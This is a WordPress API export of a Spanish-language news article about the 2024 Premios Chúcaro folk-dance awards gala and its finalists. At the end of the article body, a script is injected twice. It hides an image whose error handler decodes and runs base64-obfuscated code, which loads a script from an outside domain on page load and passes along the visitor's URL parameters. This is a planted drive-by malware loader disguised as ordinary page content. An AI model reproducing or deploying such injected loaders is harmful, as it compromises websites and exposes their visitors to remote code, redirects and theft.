{"id":4654,"date":"2024-12-03T10:49:22","date_gmt":"2024-12-03T13:49:22","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4654"},"modified":"2025-08-13T23:44:12","modified_gmt":"2025-08-14T02:44:12","slug":"premios-chucaro-el-ballet-folklorico-de-la-provincia-presenta-una-nueva-gala-en-buenos-aires","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4654","title":{"rendered":"Premios Ch\u00facaro: El Ballet Folkl\u00f3rico de la Provincia presenta una nueva gala en Buenos Aires"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-1bb79abca4ca0a37a4fc80f50f0fba72\" style=\"background-color:#540536\"><em>La quinta edici\u00f3n de los Premios Ch\u00facaro se celebrar\u00e1 este 3 de diciembre y contar\u00e1 con la presentaci\u00f3n del Ballet Folkl\u00f3rico en vivo.<\/em><\/h3>\n\n\n\n<p>Hoy&nbsp;3 de diciembre se llevar\u00e1 a cabo la quinta edici\u00f3n de los Premios Ch\u00facaro 2024. La ceremonia se celebrar\u00e1 a las 18 horas en el Auditorio de Radio Nacional, en la Ciudad Aut\u00f3noma de Buenos Aires. El evento ser\u00e1 transmitido a todo el pa\u00eds por la TV P\u00fablica. Este a\u00f1o, el galard\u00f3n, instituido por la Asociaci\u00f3n Premios Ch\u00facaro continuar\u00e1 con su misi\u00f3n de destacar y poner en valor la danza folkl\u00f3rica argentina, premiando los mejores espect\u00e1culos de danzas folkl\u00f3ricas a nivel federal.<\/p>\n\n\n\n<p>Los Premios Ch\u00facaro, que cuentan con el apoyo de la Fundaci\u00f3n Santander a trav\u00e9s de su Programa de Participaci\u00f3n Cultural-Mecenazgo, reconocer\u00e1n a los principales artistas de la danza nacional en categor\u00edas como Bailar\u00edn\/a, Pareja de Baile, Cuerpo de Baile, Musicalizaci\u00f3n, Coreograf\u00eda, Vestuario, Mejor Obra y Mejor Obra de Videodanza. Este a\u00f1o, adem\u00e1s, se incorpora una nueva categor\u00eda: Malambo de Espect\u00e1culo. Los finalistas de las distintas etapas provinciales y regionales, distribuidas en siete \u00e1reas geogr\u00e1ficas del pa\u00eds, llegar\u00e1n a la gala con la esperanza de ser consagrados en sus respectivos rubros.<\/p>\n\n\n\n<p>La ceremonia contar\u00e1 con la presencia de destacados referentes de la cultura nacional, quienes acompa\u00f1ar\u00e1n el evento como invitados. Adem\u00e1s, se podr\u00e1 disfrutar de una serie de presentaciones en vivo, que incluyen a El Chaque\u00f1o Palavecino, el Ballet Folkl\u00f3rico Nacional, Peteco Carabajal, el Ballet Folkl\u00f3rico de la Provincia de Salta Mart\u00edn Miguel de G\u00fcemes y el Grupo Tahu\u00e9, entre otros.<\/p>\n\n\n\n<p>Entre los nominados m\u00e1s destacados, encontramos en la categor\u00eda Cuerpo de Baile al Ballet Folkl\u00f3rico de la Provincia de Salta, la Compa\u00f1\u00eda de Danzas Folkl\u00f3ricas La Biaba y el Ballet Chacaymanta, entre otros. Los premios tambi\u00e9n incluyen reconocimientos para la mejor musicalizaci\u00f3n, coreograf\u00eda, vestuario y malambo de espect\u00e1culo.<\/p>\n\n\n\n<p>En cuanto a las obras, figuran como finalistas \u201cPrimaveras somos\u201d, del Ballet Folkl\u00f3rico de la Provincia de Salta, junto con \u201cAll\u00e1 en el yerbal\u201d de la Compa\u00f1\u00eda de Danzas Folkl\u00f3ricas La Biaba y \u201cSantos Vega: El alma triste del payador\u201d del Ballet Chacaymanta, mientras que en la categor\u00eda Videodanza destacan \u201cYuyeras\u201d, \u201cReminiscencia\u201d y \u201cLeda y Mar\u00eda\u201d.<\/p>\n\n\n\n<p>Este evento constituye una de las celebraciones m\u00e1s importantes de la danza folkl\u00f3rica en Argentina, uniendo a las distintas regiones del pa\u00eds en un reconocimiento al talento y la creatividad de los artistas nacionales.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La quinta edici\u00f3n de los Premios Ch\u00facaro se celebrar\u00e1 este 3 de diciembre y contar\u00e1 con la presentaci\u00f3n del Ballet Folkl\u00f3rico en vivo. Hoy&nbsp;3 de diciembre se llevar\u00e1 a cabo la quinta edici\u00f3n de los Premios Ch\u00facaro 2024. La ceremonia se celebrar\u00e1 a las 18 horas en el Auditorio de Radio Nacional, en la Ciudad [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4655,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,21,17],"tags":[],"class_list":{"0":"post-4654","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-nacional","9":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4654"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4654"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4654\/revisions"}],"predecessor-version":[{"id":6620,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4654\/revisions\/6620"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4655"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4654"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4654"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4654"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}